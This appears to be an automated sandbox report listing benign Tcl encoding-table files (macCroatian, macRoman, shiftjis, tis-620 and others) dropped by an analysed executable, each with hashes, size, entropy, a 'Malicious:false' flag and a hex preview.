                                                                                                                                                                                                                                            SSDEEP:24:8ULyHVBUlJvRj7SOVbusZhAMiZyi77qsTMdKxOZwwL+KR5D/jlJy6QWky:8ULyMlBVnrAMiwMmOsL+KR5DblE85
                                                                                                                                                                                                                                            MD5:A60FBDE33D13C732095713D1AB6713AB
                                                                                                                                                                                                                                            SHA1:4B0EB443F2D0E4B8DB7D0435F9311E5F9A625123
                                                                                                                                                                                                                                            SHA-256:BBE6F5EBB5EAB08C91DF7D524FAF39B03AA8B9F84C67ABA0553A84EC56668CB9
                                                                                                                                                                                                                                            SHA-512:3EEBA6BA3FCD875AFBD5DF41EDC21E872416A48D03343232904CC99CAF913045DAF7B1A1ACD0949EF794AD7B6C9AE8F93808423FFC4B67718E732B2FF5D9B6D7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macCroatian, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8..221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8..00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153..01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB..201300B7201A201E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.4178221849964903
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8dHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJY:8dMlBVnrAMiwMm8Y6zUk+UVsJY
                                                                                                                                                                                                                                            MD5:C390D66441AC61CCF0A685CA5EE0BC1C
                                                                                                                                                                                                                                            SHA1:FCAE825B54400B9D736EF22A613E359E3F0FA6C2
                                                                                                                                                                                                                                            SHA-256:76EFE571ADDA7AED467F146CB0BD3A2351F2A720508EA0642C419F5347789CAA
                                                                                                                                                                                                                                            SHA-512:C891DB15E0F600965885DE6745EDD2A4E3A6A20CA30A9AAE89CBD8C429F8455C4AF7F2FC053FB3D730D8544AB6A6E78E769DB93DAD7B29868B746FA10373F021
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macCyrillic, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..0430043104320433
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.870022681111701
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:87JMHkUlJvRjmf9RCsUBOdXsCbbNviANpkDP1XFAoE4xSF5HrBPkdn:87KvlA9RCs6CXrViANUP1XFA9eSvdPKn
                                                                                                                                                                                                                                            MD5:DCE78527E3A7B7CB1DE9EE5FAF12AFC6
                                                                                                                                                                                                                                            SHA1:20F4A3F4DB6B3422C04EBB6B21A568E4C173F9C1
                                                                                                                                                                                                                                            SHA-256:062E31D48DC33160999074E49205E08C3655DFF91C2C87F254522E6EBCE2DD96
                                                                                                                                                                                                                                            SHA-512:627F5FD2F12B341F2D7EE9032946FE057C4AC74D99687178CEA98B3E150307BB6AA2495B0FA46400760D467E2BF589BE31E998E25CE1D1E8465DA61F22047345
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macDingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1113
                                                                                                                                                                                                                                            Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                                            MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                                            SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                                            SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                                            SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                                            MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                                            SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                                            SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                                            SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48813
                                                                                                                                                                                                                                            Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                                            MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                                            SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                                            SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                                            SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1113
                                                                                                                                                                                                                                            Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                                            MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                                            SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                                            SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                                            SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                                            MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                                            SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                                            SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                                            SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                                            MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                                            SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                                            SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                                            SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                                            MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                                            SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                                            SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                                            SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                                            MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                                            SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                                            SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
                                                                                                                                                                                                                                            SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42552
                                                                                                                                                                                                                                            Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                                            MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                                            SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                                            SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                                            SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                                            MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                                            SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                                            SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                                            SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                                            MD5:467A67DE6809B796B914F5BFF98EF46D
                                                                                                                                                                                                                                            SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                                            SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                                            SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8235
                                                                                                                                                                                                                                            Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
